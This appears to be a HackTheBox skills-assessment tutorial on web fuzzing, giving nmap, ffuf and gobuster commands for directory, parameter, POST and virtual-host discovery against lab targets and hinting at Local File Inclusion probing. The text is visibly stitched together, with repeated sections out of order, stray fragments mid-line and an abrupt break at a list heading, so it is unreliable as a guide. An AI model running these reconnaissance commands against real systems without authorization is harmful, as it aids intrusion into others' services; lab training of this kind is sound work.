Let’s simulate a typical HTB Skills Assessment scenario. You are given an IP: 10.10.10.200.
Step 1: Initial Scan (Nmap)
nmap -p- --min-rate 1000 10.10.10.200
# Output: 80/tcp open http
Step 2: Directory Fuzzing
ffuf -u http://10.10.10.200/FUZZ -w common.txt
# Finds: /assets (301), /hidden (200), /index.php (200)
Step 3: Recursive Fuzzing
Navigate to /hidden. It says "Access Denied". Fuzz inside /hidden/:
ffuf -u http://10.10.10.200/hidden/FUZZ -w directory-list-2.3-medium.txt
# Finds: /hidden/backup.zip (200)
Step 4: Download & Analyze
Download backup.zip. Unzip reveals creds.txt containing user:pass and a note: "API endpoint at /api/v1/status".
Step 5: Parameter Fuzzing on API
Browse to /api/v1/status. Returns JSON: "error": "missing param".
Fuzz for parameters: htb skills assessment - web fuzzing
ffuf -u http://10.10.10.200/api/v1/status?FUZZ=1 -w burp-parameter-names.txt -mr 'error'
You find user_id. Now fuzz the value:
ffuf -u http://10.10.10.200/api/v1/status?user_id=FUZZ -w numbers.txt -mr 'admin'
At user_id=1337, the response changes: "role": "admin", "token": "eyJhbG...". You have now passed the assessment's core objective.
If the page accepts POST data (common for login forms or API endpoints), you need to send data in the body.
Command:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://<TARGET_IP>/admin/admin.php -X POST -d 'FUZZ=test' -H 'Content-Type: application/x-www-form-urlencoded'
Expected Outcome: You discover a parameter name (e.g., id, user, file) that changes the behavior of the page. Let’s simulate a typical HTB Skills Assessment scenario
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
This is where beginners fail the HTB assessment. You found a page like http://target.htb/api.php. It returns a blank page. Now what?
Parameter Fuzzing: You need to guess the HTTP parameter the script expects.
ffuf -u http://target.htb/api.php?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs 0
Flag -fs 0 filters out responses with a content size of 0 bytes (blank pages).
If you find a parameter like debug or file, you can then fuzz its value. For example, ?file=FUZZ to look for Local File Inclusion (LFI).
Virtual Host Fuzzing: The assessment may hide a second application on a different Virtual Host. Step 2: Directory Fuzzing ffuf -u http://10
ffuf -u http://10.10.10.x/ -H "Host: FUZZ.target.htb" -w subdomains.txt -fs 5000
If you get a different response for admin.target.htb, add it to your /etc/hosts file and browse to it. This new vhost is often the actual target of the assessment.
The HTB Skills Assessment expects you to be comfortable with command-line tools. While dirb and wfuzz are classics, the modern standard is ffuf (Fuzz Faster U Fool). We will focus on ffuf due to its speed, flexibility, and MATCH/FILTER logic.
Install ffuf (if you haven't):
sudo apt install ffuf -y
# Or from source: go get github.com/ffuf/ffuf
Critical Wordlists (Seclists): HTB often provides a small wordlist, but real success requires the SecLists repository.
sudo apt install seclists -y
# Located in /usr/share/seclists/
Key lists for the assessment: